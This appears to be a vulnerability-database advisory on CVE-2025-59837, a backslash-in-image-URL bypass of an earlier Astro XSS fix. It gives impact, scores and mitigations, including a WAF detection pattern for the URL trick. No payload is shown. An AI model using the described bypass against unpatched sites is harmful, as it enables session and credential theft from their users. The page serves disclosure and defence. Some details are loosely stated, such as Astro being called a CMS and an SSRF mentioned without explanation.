Platform
nodejs
Component
astro
Fixed in
5.13.5
5.13.10
CVE-2025-59837 represents a patch bypass vulnerability within the Astro content management system. This flaw allows attackers to circumvent the intended fix for CVE-2025-58179, enabling cross-site scripting (XSS) attacks. The vulnerability impacts versions of Astro prior to 5.13.10 and can be exploited by crafting malicious image URLs containing backslashes. A fix has been released in version 5.13.10.
This XSS vulnerability allows an attacker to inject arbitrary JavaScript code into a user's browser when they access a crafted URL. Successful exploitation could lead to the theft of sensitive information, such as session cookies, authentication tokens, and personally identifiable information (PII). Attackers could also leverage this vulnerability to redirect users to malicious websites, deface the website, or execute arbitrary code on the user's machine. The bypass nature of this vulnerability makes it particularly concerning, as it circumvents a previously deployed security patch. The attack vector involves manipulating image URLs, making it potentially difficult to detect through standard input validation techniques.
This vulnerability is a patch bypass, meaning it exploits a weakness in a previously released fix. Public proof-of-concept (PoC) code is available, demonstrating the ease of exploitation. The vulnerability was publicly disclosed on 2025-10-28. It is not currently listed on the CISA KEV catalog, and there are no confirmed reports of active exploitation at this time, but the availability of a PoC increases the risk of exploitation.
Exploit Status
EPSS
0.07% (20% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2025-59837 is to upgrade to Astro version 5.13.10 or later. If upgrading is not immediately feasible, consider implementing a Web Application Firewall (WAF) rule to block requests containing backslashes in image URLs. Specifically, look for patterns like \raw.githubusercontent.com. Additionally, review and sanitize all user-supplied input, especially when handling image URLs. Monitor application logs for suspicious activity, such as unusual requests containing backslashes in image URLs. After upgrading, confirm the fix by attempting to trigger the bypass with a known malicious URL and verifying that the script is not executed.
Update Astro to version 5.13.10 or higher. This version contains the fix for the SSRF and XSS vulnerability. Run `npm update astro` or `yarn upgrade astro` to update to the latest version.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2025-59837 is a patch bypass vulnerability in Astro, allowing attackers to inject malicious scripts via backslashes in image URLs, potentially leading to data theft and account takeover.
You are affected if you are using Astro versions prior to 5.13.10 and are vulnerable to XSS attacks through manipulated image URLs.
Upgrade to Astro version 5.13.10 or later. As a temporary workaround, implement a WAF rule to block requests containing backslashes in image URLs.
While there are no confirmed reports of active exploitation, the availability of a public proof-of-concept increases the risk.
Refer to the Astro security advisory on their GitHub repository: [https://github.com/withastro/astro/security/advisories/CVE-2025-59837](https://github.com/withastro/astro/security/advisories/CVE-2025-59837)
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.